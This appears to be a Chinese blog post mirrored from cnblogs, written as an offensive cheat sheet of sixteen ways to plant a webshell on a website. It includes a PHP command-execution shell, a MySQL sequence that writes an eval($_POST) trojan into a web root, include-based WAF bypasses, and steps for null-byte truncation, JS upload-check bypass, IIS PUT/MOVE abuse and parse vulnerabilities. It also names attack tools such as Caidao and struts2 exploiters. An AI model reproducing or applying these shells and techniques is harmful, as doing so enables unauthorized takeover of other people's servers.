zoukankan      html  css  js  c++  java
  • Webshell篇

    常用方法简介:

    一、0day拿webshell

    参考工具:织梦漏洞利用小工具

    二、通过注入漏洞拿Webshell

    前提条件:具有足够权限,对写入木马的文件夹要有写入权限,知道网站绝对路径。

    对于mssql注入漏洞,网站可以通过log备份、差异备份拿Webshell

    对于mysql注入漏洞的网站可以通过into   file函数将一句话木马写入,拿Webshell。

    参考工具:Getwebshell增强版、pangolin、

    三、通过远程命令执行拿Webshell

    zhu.php

    <?php
    $x=$_GET["z"];
    echo  "<pre>";
    echo shell_exec($x);
    echo  "<pre>";
    ?>
    

    然后再浏览器访问此php文件,跟一个z的参数是一句话木马,输出到cracer.php文件

    跟着在浏览器访问一下这个php文件,再用菜刀连接就可以了

    四、struts2拿Webshell

    参考工具:鬼哥struts2、Struts2漏洞批量检测

    五、通过用户上传头像拿Webshell

    原理:用户注册后,有些网站可以上传头像图片、附件、文件等,可以利用此来上传Webshell

    六、IIS写权限拿webshell

    原理:通过找到有IIS写入权限的网站,put进去一个txt文件,目录必须有可写的权限,然后通过move方法进行重命名为xxx.php

    参考工具:IIS  put scanner

    七、本地JS验证突破拿Webshell

    当网站设置了JS来限制用户上传的文件类型时,我们可以通过删除JS文件或者修改上传文件类型突破上传限制拿Webshell

    参考工具:使用burpsuit或fiddler代理工具提交,本地文件先改为XXX.jpg,上传时拦截,再把文件名后缀更改为php即可

    八、修改网站上传类型配置拿Webshell

    有的网站设置了上传类型的限制,修改其上传类型即可

     九、文件包含拿Webshell

    先将Webshell改为txt文件上传,然后上传一个脚本文件包含该txt文件,可绕过waf拿webshell

    asp包含

    1.<!--#include  file="123.jpg"-->
    2.调用的文件和被调用的文件必须在同一个目录,否则找不到
    3.不同目录之间包含
    <!--#include  virtual="文件所在目录/123.jpg"-->
    

    php包含

    <?php include ("123.jpg")?>;
    

    十、网站配置插马拿Webshell

    通过找到网站默认配置,将一句话插入网站配置中间。

    十一、利用编辑器漏洞拿Webshell

    常见的编辑器漏洞有fckeditor、ewebeditor、cheditor等

    十二、通过编辑器模板拿Webshell

    通过对网站的模板进行编辑写入一句话,然后生成脚本文件拿webshell

    通过将木马添加到压缩文件,把名字改为网站模板类型,上传到网站服务器拿webshell

    十三、数据库命令执行拿webshell

    可以利用phpmyadmin登录数据库使用数据库命令将木马导出,拿Webshell(适用于phpmyadmin比较老的版本)

    create  table  study  (cmd  text  NOT  NULL);
    insert   into  study(cmd)  VALUES  ('<?php eval ($_POST[cmd])?>');
    select  cmd  from  study  into  outfile  'D:/www/rooney.php';
    drop  TABLE  IF  EXISTS  study;
    

    十四、00截断拿Webshell

    在上传文件的时候,你上传的文件名可能会被网站自动改成别的名字,这个时候你可以尝试抓取文件上传数据包,将文件名改为XX.asp%00.jpg进行截断上传,拿webshell

    十五、利用解析漏洞拿Webshell

    IIS  5.X/6.0解析漏洞
    IIS  7.0/IIS  7.5 /nginx  < 8.03  畸形解析漏洞
    nginx  < 8.03 空字节代码执行漏洞
    Apache 解析漏洞
    

    十六:另类拿Webshell

    更新页面拿 Webshell
    上传插件拿Webshell
    上传特殊马拿Webshell
    上传免杀马过安全软件
    
  • 相关阅读:
    [代码]比较XML文件差异[cl_proxy_ui_utils=>show_xml_diff]
    查看日期属性(休息日、节假日、星期几)[DAY_ATTRIBUTES_GET]
    ABAP中字符串处理方法小结(一)
    ABAP中字符串处理方法小结(二)
    [问题解决]ALV可输入状态下输入金额/数量字段小数位数提前的问题
    自适应背景图
    js原型继承
    仿留言功能
    鼠标画图效果
    照片切换,24小块分散效果
  • 原文地址:https://www.cnblogs.com/steven9898/p/11396164.html
Copyright © 2011-2022 走看看